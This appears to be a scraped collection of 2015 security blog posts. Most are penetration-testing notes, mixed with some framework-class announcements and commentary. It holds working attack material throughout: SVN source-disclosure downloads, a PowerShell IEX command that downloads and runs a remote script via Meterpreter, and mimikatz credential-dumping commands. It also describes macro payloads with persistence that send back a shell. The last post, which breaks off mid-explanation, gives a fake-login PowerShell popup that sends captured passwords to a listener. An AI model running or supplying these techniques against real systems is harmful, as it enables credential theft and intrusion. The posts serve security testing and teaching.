[+] [1.2.3.52:80] SVN Entries file found.

[*] [1.2.3.52] dir CURRENT [dw394]

[*] - Trying to get file rss2html2.php source code.

[*] - Location: /.svn/text-base/rss2html2.php.svn-base

[*]

Fatal error: Call to undefined function FeedForAll_scripts_readFile() in /usr/local/apache2-marketing/htdocs/.svn/text-base/rss2html2.php.svn-base on line 772

---SNIP---

[*] Done. 175 records.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Unfortunately web servers will usually catch the php and try to render it for you :-(

Once you have the source you look for config files or interesting things in the source code

Example:

Subversion 1.7 and later

Working copy and changes stored in a sqlite database

Example:
http://www.somedomain.com/.svn/wc.db

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_wcdb_scanner

From the SANS link below example to pull out files on the server

"We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion."

$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...

Anything with a .svn/pristine should be downloadable:

$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...

Example:

Great reference for the above:

http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us

Other blog posts on the subject:

https://blog.netspi.com/parsing-svn-entries-files-with-powershell/

Fixes (quick Google searches, didnt test)

Apache

or

RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /

nginx

location ~ /.svn/ {
deny all;
}

.htaccess

RedirectMatch 404 (?i)\.svn

IIS
couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis

also http://www.petefreitag.com/item/823.cfm (Great site BTW)

Cybersecurity Framework Class: Theory and Practice (Using NIST and C2M2 as Foils)

Thu, 26 Feb 2015 06:48:59 +0000

Edit: This class has *significantly* changed, expanded, and improved since i posted this. Ask me about it.

As I may have mentioned…a lot…in several forums….including my previous post here…I’ll be teaching a cybersecurity framework class this year around the United States. It will use the NIST Framework and ES-C2M2 as foils, but it won’t be “training” for them. What it will REALLY be about is using a structured approach to scope out what cybersecurity means from a business perspective and how to apply existing practices and thoughts to actually reducing security risk, instead of just building the same old security program over again and hoping for the increasingly unlikely “best”. Anyway, find dates and sign up at the following link and see the Class Abstract and Outline below. (Also, at the very end, find two of the key custom models I’ll be using): http://www.energysec.org/upcoming-live-events/

Practical Cybersecurity Frameworks Applied to Real World Problems

OVERVIEW This 2-day class – the first of several throughout the U.S. in 2015 – is intended for those leaders, decisions makers, and technologists who feel that they are lacking a usable bridge between the technology and business aspects of cybersecurity and wish to do more than simply build a standard security program and hope for the best.

A three-part class, students will begin by exploring the theory behind using structured information to create value and the theory behind cybersecurity as a business problem and discipline.

With that theory as a foundation, the class will then use two existing frameworks – the new NIST-Facilitated Cybersecurity Framework and the Department of Energy’s Capability Maturity Model (C2M2) – as foils for discussing how best to build framework bridges between “Security Programs”, “Risk Management”, and “Business Value Management”.

The final day of the class will be used as a facilitated workshop in which the class will either solve “conceptualized” real world problems or, if appropriate, bring their own existing problems to the table to work through.

We hope that students will, at the end, feel they have gained a deeper understanding of cybersecurity and frameworks as they pertain to their own fields than they would have received in more traditional “Training” in products, technologies, and frameworks and will be able to apply these new perspectives to enhance the job they do in the real world.

More than anything else, we hope students will find value in spending two days considering cybersecurity in ways they might not have before.

Students should also be aware that, despite some use of jargon, no technical experience or security expertise is assumed and each class will be tailored to the experience levels of those in attendance wherever possible.

CLASS OUTLINE

WELCOME AND INTRODUCTION
1. Ice Breaking Exercise

FRAMEWORK THEORY: Structuring Information to Enhance Value
1. Defining Frameworks
2. Four Framework Design Principles
  1. Label Awareness: Types of words and meanings
  2. Protocol Stacks: Using Layers to Abstract Common Framings
  3. Model/View/Controller: Humans are Systems, Too
  4. Stages of Value: The Means Can Be As Important as the End

SECURITY THEORY: Creating a Consensus Model
1. Defining Cybersecurity as a Problem: A Parasitic Model
2. Scoping Cybersecurity as a Discipline: Contrasting Perspectives

COMPARISON #1: VULNERABILITY INTRODUCTION VS. EXPLOITATION
COMPARISON #2: QUALITY MANAGEMENT VS. RISK RESPONSE
COMPARISON #3: HUMANS VS. TECHNOLOGY
COMPARISON #4: STRATEGY VS. TACTICS
COMPARISON #5: RISKS FROM VS. RISKS TO (CIA)
COMPARISON #6: ENABLEMENT VS. PROTECTION
COMPARISON #7: DEFENDING VS. IMPROVING
COMPARISON #8: ONE-TIME VS. CONSISTENT BEHAVIOR
COMPARISON #9: INCIDENT VS. EXPOSURE MANAGEMENT
COMPARISON #10: ERROR VS. DEFAULT HANDLING
COMPARISON #11: PERCEPTION VS. FACT
COMPARISON #12: EMERGENT VS. PREDICTABLE STATE
COMPARISON #13: CYBER VS. PHYSICAL SPACE
COMPARISON #14: EFFICACY VS. COMPLIANCE

FURTHER STRUCTURAL CONSIDERATIONS: Helpful Linking Concepts
1. Common Terms & Parenthetical Comparisons
2. Kill Chains
3. Metrics Defined
4. Control Convergence
5. Development Lifecycles
6. “Capabilities” Defined
7. Risk Management
8. Others

CONNECTING FRAMEWORK THEORY TO SECURITY THEORY
1. Demonstrate a containing elements of both the framework and security discussions to be used as a Reasoning Aid throughout the remainder of the class
2. Adjust the Model
EVALUATING THE NIST FRAMEWORK AND C2M2
1. Using the domain models discussed earlier, the class will evaluate the structure and content of both the NIST Framework and the C2M2. We will describe use cases, dependencies, how they can be linked together, and how our own class models can be used to fill the shared gaps in both frameworks. The intent of this section is not to critique other work, but to understand the concepts and work needed to build custom integration approaches and frameworks that will help students more effectively utilize existing work to reduce overall risk in their own environments.
DAY-LONG FACILITATED WORKSHOP
1. We will scope a theoretically-real security problem, use framework design principles, and eventually (hopefully!) arrive at successful risk reduction approaches over the course of the day. This workshop may flex according to student need and desire.

Filed under: Critical Infrastructure Protection, Executive Order/NIST Framework, Risk Management Theory Tagged: class, Cyber Security, education, ICS security, Information Security, information theory, theoretical security, Training

Running PowerShell Scripts That Require Module Imports With Meterpreter

noreply@blogger.com (CG) — Mon, 23 Feb 2015 14:00:00 +0000

Old post on the subject here:

http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html

More recent posts on the subject by harmj0y

http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/

Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk

Gist with the command

meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>

Via IEX download method: Gist with the command

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM

C:\Users\user\Desktop>

Powershell dumping all certs in the cert store

noreply@blogger.com (CG) — Fri, 20 Feb 2015 16:31:00 +0000

Put this on twitter just posting it here so I can find it later.

You can use powershell to list all the certificates on a host

powershell -Command Get-ChildItem -Recurse Cert: > certs.txt

If you are searching for something specific you can pass to findstr

powershell -Command Get-ChildItem -Recurse Cert: | findstr -i Superfish

Boards Not Briefed on Strategy?

Richard Bejtlich — Thu, 19 Feb 2015 12:43:00 +0000

I'd like to make a quick note on strategy, after reading After high-profile hacks, many companies still nonchalant about cybersecurity in the Christian Science Monitor today. The article says:

In a survey commissioned by defense contractor Raytheon of 1,006 chief information officers, chief information security officers, and other technology executives, 78 percent said their boards had not been briefed even once on their organization’s cybersecurity strategy over the past 12 months...

The findings are similar to those reported by PricewaterhouseCoopers in its Global State of Information Security Survey last year in which fewer that 42 percent of respondents said their board actively participates in overall security strategy.

Does this worry you? Do you want to introduce strategic thinking into your board discussion? If the answer is yes, consider these resources.

1. Check out my earlier blog posts on strategy, especially the first two articles.

2. Watch the keynote I delivered at ArchC0n last year. My section starts around 8:30.

3. For those who want to apply strategic thought to network security monitoring, I addressed that in a Webcast for O'Reilly last year.

At the end of the day, we need to be talking in strategic terms with business leaders, not technical terms. They are not having the conversations they need, and too few of us know how to speak a language that aligns with their interests and goals.

We need to convince boards and CxOs that we are understand their goals, and that security teams are implementing the correct strategy and running the right campaigns to achieve business objectives. We should not be talking to them about the tactics and tools to support the strategy and campaigns. Sell executives on your strategy, not your technical knowledge.

My GoldDigger Script

noreply@blogger.com (CG) — Mon, 16 Feb 2015 14:00:00 +0000

Awhile back I created a post module that would index various types of file types so I could more quickly find and decide if i wanted to do download potentially useful files.

I like to look for the passwords.txt/passwords.xls/passwords.doc in addition to other configuration files. Finding and reviewing these can be a bit tedious on the command line.

The script is based on the enum_files post module and it will let you pick the extensions you are interested in as well as which drive to search. Instead of just downloading all those files it creates two output files per file type (in loot). One file that is easy to read and a second that is easy to cut in paste into your meterpreter console to download any files you find interesting.

msf use post/windows/gather/gold_digger
msf post(gold_digger) > info

       Name: Windows Gather Generic File Collection
     Module: post/windows/gather/gold_digger
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  3vi1john 
  RageLtMan 
  CG 

Description:
  This module looks for all office files, creates a list and the path
  to those files to download later if you want (check your loot
  folder). Based on enum_files.rb. Creates two output files in loot.
  one with the raw path and second that is more readable. Notes: Does
  not decend into Users\$user\AppData by default (not sure why). You
  have to force that directory with the SEARCH_FROM option.

msf post(gold_digger) > show options

Module options (post/windows/gather/gold_digger):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   FILE_GLOBS   *.doc*,*.xls*,*.ppt*,*.pdf  yes       The file pattern to search for in a filename
   SEARCH_FROM                              no        Search from a specific location. Ex. C:\
   SESSION                                  yes       The session to run this module on.

In action:



[*] Searching C:\Users\ for *.doc* through windows user profile structure
[*] Found C:\Users\user\Documents\Derbycon3.docx adding to the list
[*] Found C:\Users\user\Documents\Speaker Attachments.docx adding to the list
[*] Found C:\Users\user\Desktop\runroute.doc adding to the list
...

[*] Searching C:\Users\ for *.xls* through windows user profile structure

[*] Found C:\Users\user\Documents\servers.xlsx adding to the list

...

[*] Searching C:\Users\ for *.pdf* through windows user profile structure

[*] Found C:\Users\user\Desktop\scan.pdf adding to the list

...

[*] Done!
[*] Post module execution completed

Of course you can also give it full drives like C:\\ or X:\\ or change extensions you are looking for.

You can get it here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/post/windows/gather/gold_digger.rb

pfSense Without Internets

Rob Fuller — Sun, 15 Feb 2015 18:45:00 +0000

A while back I needed to set up a pfSense box for CTF/example stuff that didn’t and wouldn’t ever have Internet connectivity. Doesn’t seem like much of a task right? Just pop it in and go. Problem is that you loose the use of the packages that help make pfSense so awesome.

Once I figured it out at that time, I made a Forum post so that anyone running into the same issue wouldn’t have to struggle as much:

https://forum.pfsense.org/index.php?topic=55504.0

Most things never disappear from the Internet but I was looking for an old forum post I had bookmarked regarding some persistence methods that I noticed was no longer there since the forum owner had gotten rid of the forum as too much hassle. I get it, but when I went to Archive.org to get saved they didn’t have a copy. So this is what this post is for, to save that content just in case it disappears.

Also, here is a bug report for the “issue” (been open since 2012):

http://redmine.pfsense.org/issues/2586

If you are following:

http://doc.pfsense.org/index.php/Creating_Your_Own_Package_Repository

and you are getting:

Unable to communicate with 192.168.1.100 Please verify DNS and interface configuration, and that pfSense has functional Internet connectivity.

because you are using the repo to enable a offline (non internet connected) host to be able to utilize packages all you have to do is:

1. Go into Services –> DNS Forwarder and add a Host Override

Host: www
Domain: pfsense.org
IP Address: 127.0.0.1
Description: null routed record to enable offline repo

Then make sure you have the IP or hostname of your package repository web server in the /pkg_mgr_settings.php (on 2.0, follow the guidelines on the doc above for older versions). After that you should be good to go. Of course this is barring any Firewall blockages you might have in place so be sure to test connectivity from the pfSense box to the web server.

So, that was just the beginning, it’s actually better to not null-route it but make the following entries:

files.pfsense.org - 192.168.1.100
files.pfsense.com - 192.168.1.100
www.pfsense.org - 192.168.1.100
www.pfsense.com - 192.168.1.100

If your package web server is 192.168.1.100. Next is the problem of not having the packages themselves. So wget -mk -np http://files.pfsense.org/packages/ gave me a directory that I plopped into my already existent packages directory (created from the git clone as described in the documentation) but the problem I ran into was the php files being rendered still (which made any packages that pulled php files get the rendered version instead of source).

So you need to add a .htaccess file in the packages directory with the following:

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Make sure that AllowOverride all is enabled if you are running Apache to host the package site, if not, you’ll have to google how to allow .htaccess files for your particular server. (or if you server doesn’t support htaccess files then how to enable source disclosure)

After those alterations I seem to be off to the races for the most part. Some packages pull from other websites, but altering the package_8.xml or just rerouting the dns seems to solve most of those issues.

MSF's + Mimikatz + Windows 8.1 part two

noreply@blogger.com (CG) — Tue, 10 Feb 2015 14:58:00 +0000

I love twitter. OJ replied to me about my metasploit+mimikatz+Windows 8.1 post

Looks like mimikatz 2.0 IS in msf, its just under the use kiwi functionality

meterpreter > use kiwi
Loading extension kiwi...

.#####. mimikatz 2.0 alpha (x64/win64) release "Kiwi en C"
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.

meterpreter > help
Kiwi Commands
=============

Command Description
------- -----------
creds_all Retrieve all credentials
creds_kerberos Retrieve Kerberos creds
creds_livessp Retrieve LiveSSP creds
creds_msv Retrieve LM/NTLM creds (hashes)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds
creds_wdigest Retrieve WDigest creds
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
lsa_dump Dump LSA secrets
wifi_list List wifi profiles/creds

I wasn't able to get the hashes with any of the creds_* modules but lsa_dump and kerberos functionality seemed to be working like it should.

HTH for future pentests.

-CG

MSF's Mimikatz doesnt work on Windows 8.1 what can you do?

noreply@blogger.com (CG) — Mon, 09 Feb 2015 14:00:00 +0000

So you are on a Windows 8.1 box. You go to run the trusty mimikatz-->wdigest and it fails.

Well technically it will work but there wont be anything there

Using the current mimikatz that ships with metasploit (as of 1/16/2015) will not return anything. This is because 8.1 doesn't keep passwords in memory any more.

However, you should still be able to get hashes and kerberos tickets

The current standalone version of mimikatz will do this

https://github.com/gentilkiwi/mimikatz/releases/

and using the

mimikatz # sekurlsa::logonpasswords

https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Dumping kerberos tickets should also work

mimikatz # sekurlsa::tickets /export

relevant to the above
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#ptt
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos#golden

minidump should also work

http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html

Curious what works with different versions of Windows?

https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!2074&cid=a352ebc5934f0254&app=Excel

Other references

Mimikatz info dump:
http://adsecurity.org/?p=556

pass the ticket and golden ticket info:
http://www.glasspaper.no/Documents/UsefulHackingSeries_Episode2.pdf

Mimikatz talk by gentilkiwi
http://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf
https://2014.rmll.info/slides/80/day_3-1010-Benjamin_Delpy-Mimikatz_a_short_journey_inside_the_memory_of_the_Windows_Security_service.pdf

Golden Ticket tutorial
http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/

https://www.christophertruncer.com/golden-ticket-generation/

Cisco ASA version grabber (CVE-2014-3398)

noreply@blogger.com (CG) — Mon, 02 Feb 2015 14:00:00 +0000

Was catching up on blogs and re-reading some things and re-came across this blog post and Ruxcon slides
http://breenmachine.blogspot.com/2014/10/cisco-asa-ssl-vpn-backdoor-poc-cve-2014.html
https://ruxcon.org.au/assets/2014/slides/Breaking%20Bricks%20Ruxcon%202014.pdf

While looking for some of the POCs I found this separate issue:

http://blog.spiderlabs.com/2014/04/privilege-escalation-vulnerability-in-cisco-asas-ssl-vpn.html

https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt

Demo Video
https://vimeo.com/93010946

Slide deck
https://speakerdeck.com/claudijd/crowdsourcing-your-cisco-firewall-administration-dot-dot-dot-wat

The more important part of this was (for me) how to identify the vulnerable versions of ASAs

From the SpiderLabs post:

Cisco ASA administrators can remediate this vulnerability by applying the latest firmware for your appliance. Depending on the ASA model you will want to upgrade to at least version 8.2(5.48), 8.3(2.40), 8.4(7.15), 8.6(1.13), 8.7(1.11), 9.0(4.1), or 9.1(4.5).

If you check out the Ruxcon slides (slide 75) you'll see that Alec discovered a version disclosure issue (CVE-2014-3398)

I couldn't find the nmap NSE referenced.

**UPDATE**
here it is: https://github.com/alec-stuart/BreakingBricks
**UPDATE**

aaaaannnd given that it's just a GET request, I wrote an auxiliary module to do this check:

https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/cisco_asa_version_leak.rb

Sample output

msf > use auxiliary/dev/webapp/cisco_asa_version_leak
msf auxiliary(cisco_asa_version_leak) > set VERBOSE true
VERBOSE => true
msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host1
RHOSTS => vpn.host1
msf auxiliary(cisco_asa_version_leak) > run

[+] 1.1.1.1:443-ASA Version: 9.0(3)8
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host2
RHOSTS => vpn.host2
msf auxiliary(cisco_asa_version_leak) > run

[+] 2.2.2.2:443-ASA Version: 9.1(5)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host3
RHOSTS => vpn.host3
msf auxiliary(cisco_asa_version_leak) > run

[+] 3.3.3.3:443-ASA Version: 8.4(7)22
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_version_leak) > set RHOSTS vpn.host4
RHOSTS => vpn.host4
msf auxiliary(cisco_asa_version_leak) > run

[*] 4.4.4.4:443 Received 302 to https://129.78.208.25/+webvpn+/index.html (PATCHED)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I also found this nmap script

http://nmap.org/nsedoc/scripts/http-cisco-anyconnect.html

but I checked against the above hosts and it didnt return any results :-/ so meh.

quick check just as a place to put it

curl -ssl -k -v "https://1.2.3.4/CSCOSSLC/config-auth"

other fun

inurl:logon.html "CSCOE"

P.S.
the module to actually exploit the issue is in metasploit:
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb

At some point I may try to just add the check to that module until then you have the above.

I write on Medium sometimes now.

Mon, 26 Jan 2015 20:29:10 +0000

Semi-Biographical Travelesque Diarylog: https://medium.com/@jackwhitsitt

Filed under: Uncategorized

DevOoops: Revision Control (GitList)

noreply@blogger.com (CG) — Mon, 26 Jan 2015 14:00:00 +0000

More info from the DevOoops talk

Remote Code Execution in GitList

background blog post here: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/

P.S. if you don't read that blog, you should :-)

http://www.exploit-db.com/exploits/33929/

MSF module:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/gitlist_exec.rb

Read the blog post for the interesting details.

fun screenies

Manually checking if a site is vulnerable

Backdoor PHP using the python POC

Shell via the metasploit module

I didn't think anyone used this stuff, but its apparently pretty popular

Fixes:

current stable version 0.5.0 fixes the issue

Shmoocon Notes: Userland Persistence on Mac OS X

noreply@blogger.com (CG) — Fri, 23 Jan 2015 17:56:00 +0000

Notes from the conf for later

Userland Persistence on Mac OS X

by Josh Pitts @midnite_runr

Video
https://archive.org/details/joshpitts_shmoocon2015

the backdoor factory
https://github.com/secretsquirrel/the-backdoor-factory

--framework to patch PE, elf, Mach-O binaries

BFDProxy will patch will stuff while it is being downloaded
https://github.com/secretsquirrel/BDFProxy

must have root or equivalent to patch the various programs

Background on OSX Persistence

methods of malware persistence on os x mavericks patrick wardle
https://s3.amazonaws.com/s3.synack.com/Synack_Shakacon_OSX_Malware_Persistence.pdf

userland persistence

-plists (launchd executed similar to init) on boot, onlogon, onsocket

-evil plugins

-startupitems folders (plist or script)

-cronjobs

-/etc/rc.common

-/etc/lanchd.conf

-binary infection (backdoor factory method)

prior work
-infecting Macho-O _PAGEZERO method
-BouBou Library Injection

josh's blog post related to the talk
http://secureallthethings.blogspot.com/2014/08/patching-mach-o-format-simple-and-easy.html

pre-test section infection method-->change entry point to the evil payload, for payload continue to parent process

BDF will automatically unsign a signed binary, OSX doesnt care its not signed, just that the signature is correct

interesting boot processes that were patchable
-/sbin/launchd - the first process
-/usr/libexec/xpcproxy - almost everything uses it
-/usr/bin/security
-/usr/bin/awk awk was a boot process
launchd launches a script that launches awk

Demos in the talk

launchd patch
python script from demo: https://gist.github.com/secretsquirrel/2ba497786027472f98dd

xpcproxy

awk

Detection?

Run script on your baseline. Make note of injection candidates and what is signed and take note if at some point it is NOT signed anymore. Should indicate some muckery going on.

Enigma0x3's Generate Macro Powershell Script

noreply@blogger.com (CG) — Mon, 19 Jan 2015 14:00:00 +0000

Quick post/notes on Enigma0x3's Generate Macro payload since it got hot on twitter and reddit last week.

code is here:

https://github.com/enigma0x3/Generate-Macro

The screenshot above walks through the process

run it, pass in the URL to Invode-Shellcode.ps1, enter metasploit listener IP and port, and the name of the xls you want created.

You then pick a persistence method:

-Logon Persistence

"Meterpreter Shell with Logon Persistence: This attack delivers a meterpreter shell and then persists in the registry by creating a hidden .vbs file in C:\Users\Public and then creates a registry key in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load that executes the .vbs file on login."

-Powershell Profile Persistence

"Meterpreter Shell with Powershell Profile Persistence: This attack requires the target user to have admin right but is quite creative. It will deliver you a shell and then drop a malicious .vbs file in C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs. Once dropped, it creates an infected Powershell Profile file in C:\Windows\SysNative\WindowsPowerShell\v1.0\ and then creates a registry key in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load that executes Powershell.exe on startup. Since the Powershell profile loads automatically when Powershell.exe is invoked, your code is executed automatically."

more info: https://enigma0x3.wordpress.com/2014/06/16/abusing-powershell-profiles/

-Microsoft Outlook Email Persistence

"Meterpreter Shell with Microsoft Outlook Email Persistence: This attack will give you a shell and then download a malicious Powershell script in this location: C:\Users\Public\. Once downloaded, it will insert your defined IP address, Port, Email address and Trigger word.
It will then create a malicious .vbs file and drop it in C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\. Once dropped, it creates a registry key that executes it on login. When the Powershell script is executed, it monitors the user's Outlook Inbox for an email containing the email address you specified as well as the subject. When it sees the email, it will delete it and send you a shell."

more info https://enigma0x3.wordpress.com/2014/10/14/persistence-using-microsoft-outlook/

Then pick Meterpreter shell you want HTTP or HTTPS

Once complete you'll have a blank XLS in office2k-2k3 version.

I did confirm you can add your excel content, save and repopen the xls and it works (you will have to remove the persistence method or you'll get an error).

If you peak inside, you'll see its relatively straightforward to see whats going on.

GBN: You Can't Fix Stupid: Renewed Calls For Cybersecurity Legislation (U.S.)

Ben Tomhave — Wed, 14 Jan 2015 18:19:01 +0000

From January 2015...

As you've undoubtedly heard by now, President Obama renewed calls for increased cybersecurity legislation, all apparently because Sony Pictures Entertain (SPE) got hacked? If you've not heard, check out the mainstream press coverage here...

Continue reading here...

GBN: Sonys and Targets and Heartbleeds! Oh My!

Ben Tomhave — Wed, 14 Jan 2015 13:45:45 +0000

From January 2015...

Now that we can soundly close the book on 2014, it's perhaps a good time to take a quick think back as we consider our best path forward. 2014 was indeed the year of infosec insanity, based on the sheer number of large breaches, number of breaches, number of "major, earth-shattering" vulnerability disclosures, etcetera etcetera etcetera (if you didn't read that last bit in the voice of the King of Siam, then check it out here).

Continue reading here...

GBN: Facebook and the Derpness of Enabling Their 2FA

Ben Tomhave — Wed, 14 Jan 2015 13:44:43 +0000

From December 2014...

I was awoken around 5am post-Thanksgiving Saturday by multiple text messages from Facebook instructing me to click a link and enter a code to reset my password. It seems someone decided to try and takeover my account. This led me to conclude that now would be a good time to quit putting-off enabling 2-factor authentication (2FA) for my account. What should have been a very simple process was complicated (slightly) by a degree of true derpitude: in order to enable 2FA for my account, Facebook first insisted that I change my browser configuration (or use a different browser) that wasn't set to clear cookies after each session.

Continue reading here...

GBN: Recent GTP Security Research

Ben Tomhave — Wed, 14 Jan 2015 13:43:38 +0000

From November 2014...

Before resuming delving into any philosophical meanderings about infosec or info risk mgmt, I wanted to first highlight some recent research for you all. All of the following require a GTP subscription (go here to contact us if you're interested in getting access).

Continue reading here...

GBN: Updating GTP's DLP Coverage

Ben Tomhave — Wed, 14 Jan 2015 13:42:33 +0000

From November 2014...

It's been a couple years since the last update of our DLP coverage. In the process of updating it this go-round, I'll be taking the reins from Anton Chuvakin and picking up primary coverage of DLP for the SRMS team. In addition to revising the existing documents (Enterprise Content-Aware DLP Solution Comparison and Select Vendor Profiles and Enterprise Content-Aware DLP Architecture and Operational Practices - GTP subscription required), we'll also be spinning off a foundational document that can be referenced when getting started with a project.

Continue reading here...

2015 ShmooCon Hiring

Rob Fuller — Tue, 13 Jan 2015 18:54:00 +0000

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.

No one wants to stand at a both on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away.
It’s hard to know “who” to talk to.
So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add

https://docs.google.com/spreadsheets/d/1TytbnvqekJEF0jxLANe6sNa5fu05dFaHEP7zudlJej0/edit?usp=sharing

A Parasitic Model of Security: Teaser for my upcoming Framework class

Mon, 12 Jan 2015 19:01:11 +0000

As you may have heard, I’ll be teaching a cybersecurity framework class around the country this year. It will be fun, educational, practical, and unique. Im going to try to open the two day class up with a LEGO exercise and we’ll close with a day long practical workshop where we solve a problem or two with a customized integration of existing frameworks. In between, we’ll talk about the theory of security, the theory of frameworks, and do deep dives into the ES-C2M2 and the new NIST Cybersecurity Framework (#NISTCSF). If this sounds worthwhile – and I promise it will be to techies, executives, and in-between – check out the detailed description here and look for a class near you here. In the mean time, as a teaser, here’s one of the diagrams I’m working on for the class. It’s a parasitic model of security that tries to communicate that security is neither about technology nor can its sustained improvement be effectively modeled in terms of “incidents”.

Filed under: Critical Infrastructure Protection, Executive Order/NIST Framework, Risk Management Theory Tagged: #NISTCSF, C2M2, class, cybersecurity framework, educational, Energysec, ES-C2M2, theory of frameworks, workshop

Powershell Popups + Capture

Rob Fuller — Mon, 12 Jan 2015 18:57:00 +0000

Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)

Here is the video:

Here is the code:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

Lets break down the code line by line:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. Thats where all the magic is, everything else is just gravy.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new webclient object and sets its user agent to ‘wget’

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

